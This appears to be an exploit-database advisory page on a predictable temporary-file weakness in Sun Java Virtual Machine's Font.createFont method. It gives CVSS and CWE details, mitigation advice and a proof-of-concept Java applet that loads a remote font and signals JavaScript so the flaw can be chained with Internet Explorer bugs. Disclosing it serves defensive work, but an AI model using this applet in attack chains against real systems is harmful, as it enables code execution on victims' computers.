header-logo
Suggest Exploit
vendor:
Java Virtual Machine
by:
Not specified
7.5
CVSS
HIGH
Insecure Temporary File Creation
377
CWE
Product Name: Java Virtual Machine
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not specified
CPE: a:sun:java_virtual_machine
Metasploit:
Other Scripts:
Platforms Tested: Unix, Linux, and Microsoft platforms
Not specified

Insecure Temporary File Creation in Sun Java Virtual Machine

The Sun Java Virtual Machine is prone to an insecure temporary file creation weakness. The issue is caused by the 'Font.createFont' method creating a temporary file with a predictable name. This vulnerability can be exploited in combination with other vulnerabilities in Internet Explorer to execute arbitrary code on a vulnerable computer.

Mitigation:

It is recommended to apply the latest patches and updates from the vendor to address this vulnerability. Additionally, users should exercise caution when visiting untrusted websites and avoid downloading files from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10685/info

Sun Java Virtual Machine is a component of the Sun Java infrastructure that performs the handling of Java applets and other programs. It is available for Unix, Linux, and Microsoft platforms. 

Sun Java Virtual Machine is prone to an insecure temporary file creation weakness. It is reported that this file is created by the 'Font.createFont' method with the following name:

+~JFxxxxx.tmp

where xxxxx is a random number.

This issue can be combined with various other vulnerabilities in Internet Explorer to ultimately allow for code execution on a vulnerable computer.

import java.applet.Applet;

import java.awt.Font;

import java.net.URL;

import netscape.javascript.JSObject;



public class Jelmer extends Applet {



public void init() {



try {

Font f = Font.createFont(Font.TRUETYPE_FONT, new
URL(getParameter("infile")).openStream());

} catch(Exception ignored) {}



try {

JSObject jsWin = JSObject.getWindow(this);

jsWin.call("doneloading", new Object[]{});



} catch(Exception e) {

e.printStackTrace();

}

}

}